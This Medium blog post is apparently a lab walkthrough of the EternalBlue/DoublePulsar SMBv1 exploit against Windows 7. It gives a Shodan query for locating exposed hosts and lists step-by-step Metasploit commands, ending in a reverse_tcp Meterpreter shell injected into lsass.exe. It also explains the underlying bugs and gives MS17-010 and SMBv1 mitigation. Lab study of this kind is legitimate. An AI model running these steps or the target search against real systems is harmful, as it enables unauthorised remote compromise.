Eternal Blue DoublePulsar Exploit

Michael Koczwara

Educational purpose only.

Eternal Blue

Quick intro Eternal Blue 101

What is Eternal Blue?

EternalBlue, sometimes stylized as ETERNALBLUE, is a cyber-attack exploit developed by the U.S. National Security Agency (NSA) according to testimony by former NSA employees. It was leaked by the Shadow Brokers hacker group on April 14, 2017, and was used as part of the worldwide WannaCry ransomware attack on May 12, 2017. The exploit was also used to help carry out the 2017 NotPetya cyberattack on June 27, 2017, and reported to be used as part of the Retefe banking trojan since at least September 5, 2017.

Shodan Search

There are still tons of vulnerable systems on the internet.

Shodan search to identify potentially unpatched and affected systems:

port:445 “SMB Version: 1” os:Windows !product:Samba

shodan search

When run, we see that there are about 974,800 systems on the internet that could be vulnerable. This string does not search for vulnerabilities so we don’t know if these are patched systems or not.

Lab set up

In this lab, I will use Eternal Blue from GitHub and I will add the exploit to the Metasploit database (for the meterpreter shell purpose)

Lab set up:

Kali Linux

Windows 7 64 architecture

Eternal Blue Exploit Double Pulsar exploit from Github

Setting up Kali:

Download Eternal Blue exploit from Github to the root directory

cd /root

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

Add the exploit to your current Metasploit database

adding exploit to the metasploit database

Install and set up wine emulator to the root directory

wine emulator should be in the root directory

Nmap scan to identify open 445 port on the target machine.

nmap scan

Set up the payload:

msfconsole

use exploit/windows/smb/eternalblue_doublepulsar

info

set rhosts target machine IP address

set processinject lsass.exe (for 64 architecture)

set targetarchitecture x64

winepath — should be in the root directory

other options should be left as default

setting up the payload
setting up the payload
payload setup

set payload windows/x64/metepreter/reverse_tcp

payload setup

set lhost Kali IP address

other options should be left as default

and run exploit command

exploit resulting remote code injection and meterpreter shell

How does Eternal Blue Work

Eternal Blue relies on a Windows function namedsrv!SrvOS2FeaListSizeToNt. To see how this leads to remote code execution, let’s take a quick look at how SMB works.

Server Message Block (SMB) operates as an application-layer network protocol mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network.

Eternal Blue exploits three bugs:

The first is a mathematical error when the protocol tries to cast an OS/2 FileExtended Attribute (FEA) list structure to an NT FEA structure in order to determine how much memory to allocate. A miscalculation creates an integer overflow that causes less memory to be allocated than expected, which in turns leads to a buffer overflow. With more data than expected being written, the extra data can overflow into adjacent memory space.

Triggering the buffer overflow is achieved thanks to the second bug, which results from a difference in the SMB protocol’s definition of two related sub commands: SMB_COM_TRANSACTION2 andSMB_COM_NT_TRANSACT.

Both have a _SECONDARY command that is used when there is too much data to include in a single packet. The crucial difference between TRANSACTION2 and NT_TRANSACT is that the latter calls for a data packet twice the size of the former. This is significant because an error in validation occurs if the client sends a crafted message using the NT_TRANSACT sub-command immediately before the TRANSACTION2 one.

While the protocol recognizes that two separate sub-commands have been received, it assigns the type and size of both packets (and allocates memory accordingly) based only on the type of the last one received. Since the last one is smaller, the first packet will occupy more space than it is allocated.

Once the attackers achieve this initial overflow, they can take advantage of a third bug in SMBv1 which allows heap spraying, a technique which results in allocating a chunk of memory at a given address. From here, the attacker can write and execute shellcode to take control of the system.

Summary

Eternal Blue exploit should work on every single unpatched Windows 7 and below including Windows XP (all services pack) (x86) (x64), Windows Server 2003 SP0 (x86),Windows Server 2003 SP1/SP2 (x86), Windows Server 2003 (x64),Windows Vista (x86), Windows Vista (x64), Windows Server 2008 (x86), Windows Server 2008 R2 (x86) (x64).

How to stay secure from Eternal Blue

If possible apply Microsoft patch MS17–10, if this is not the case disabling SMBv1 also mitigate the risk.

Michael Koczwara

Written by

Senior Cyber Security Professional

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade